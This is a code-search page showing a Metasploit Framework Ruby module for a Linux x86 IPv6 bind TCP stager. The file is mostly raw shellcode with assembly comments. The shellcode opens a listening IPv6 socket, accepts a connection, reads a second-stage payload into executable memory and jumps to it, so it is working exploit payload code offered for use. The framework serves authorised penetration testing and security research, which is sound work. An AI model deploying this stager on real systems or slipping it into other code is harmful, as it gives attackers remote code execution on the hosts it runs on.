bind_ipv6_tcp.rb | searchcode

/modules/payloads/stagers/linux/x86/bind_ipv6_tcp.rb

https://bitbucket.org/technopunk2099/metasploit-framework
Ruby | 87 lines | 73 code | 7 blank | 7 comment | 0 complexity | 6f3a78c93a6e123025a55c9b600bce78 MD5 | raw file
Possible License(s): BSD-3-Clause, Apache-2.0, LGPL-2.1, GPL-2.0, MIT

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'
require 'msf/core/handler/bind_tcp'

# Linux Bind TCP/IPv6 Stager
module Metasploit3

	include Msf::Payload::Stager
	include Msf::Payload::Linux

	def self.handler_type_alias
		"bind_ipv6_tcp"
	end

	def initialize(info = {})
		super(merge_info(info,
			'Name'        => 'Bind TCP Stager (IPv6)',
			'Description' => 'Listen for a connection over IPv6',
			'Author'      => [
					'kris katterjohn', # original
					'egypt',           # NX support
				],
			'License'     => MSF_LICENSE,
			'Platform'    => 'linux',
			'Arch'        => ARCH_X86,
			'Handler'     => Msf::Handler::BindTcp,
			'Stager'      => {
					'Offsets' => { 'LPORT' => [ 0x18, 'n' ] },
					'Payload' =>

						"\x6a\x7d"             +#   push byte +0x7d
						"\x58"                 +#   pop eax
						"\x99"                 +#   cdq
						"\xb2\x07"             +#   mov dl,0x7
						"\xb9\x00\x10\x00\x00" +#   mov ecx,0x1000
						"\x89\xe3"             +#   mov ebx,esp
						"\x66\x81\xe3\x00\xf0" +#   and bx,0xf000
						"\xcd\x80"             +#   int 0x80
						"\x31\xdb"             +#   xor ebx,ebx
						"\xf7\xe3"             +#   mul ebx
						"\x53"                 +#   push ebx
						"\x43"                 +#   inc ebx
						"\x53"                 +#   push ebx
						"\x6a\x0a"             +#   push byte +0xa
						"\x89\xe1"             +#   mov ecx,esp
						"\xb0\x66"             +#   mov al,0x66
						"\xcd\x80"             +#   int 0x80
						"\x43"                 +#   inc ebx
						"\x52"                 +#   push edx
						"\x52"                 +#   push edx
						"\x52"                 +#   push edx
						"\x52"                 +#   push edx
						"\x52"                 +#   push edx
						"\x52"                 +#   push edx
						"\x68\x0a\x00\xbf\xbf" +#   push dword 0xbfbf000a
						"\x89\xe1"             +#   mov ecx,esp
						"\x6a\x1c"             +#   push byte +0x1c
						"\x51"                 +#   push ecx
						"\x50"                 +#   push eax
						"\x89\xe1"             +#   mov ecx,esp
						"\x6a\x66"             +#   push byte +0x66
						"\x58"                 +#   pop eax
						"\xcd\x80"             +#   int 0x80
						"\xd1\xe3"             +#   shl ebx,1
						"\xb0\x66"             +#   mov al,0x66
						"\xcd\x80"             +#   int 0x80
						"\x43"                 +#   inc ebx
						"\xb0\x66"             +#   mov al,0x66
						"\x89\x51\x04"         +#   mov [ecx+0x4],edx
						"\xcd\x80"             +#   int 0x80
						"\x93"                 +#   xchg eax,ebx
						"\xb6\x0c"             +#   mov dh,0xc
						"\xb0\x03"             +#   mov al,0x3
						"\xcd\x80"             +#   int 0x80
						"\x89\xdf"             +#   mov edi,ebx
						"\xff\xe1"              #   jmp ecx

				}
			))
	end
end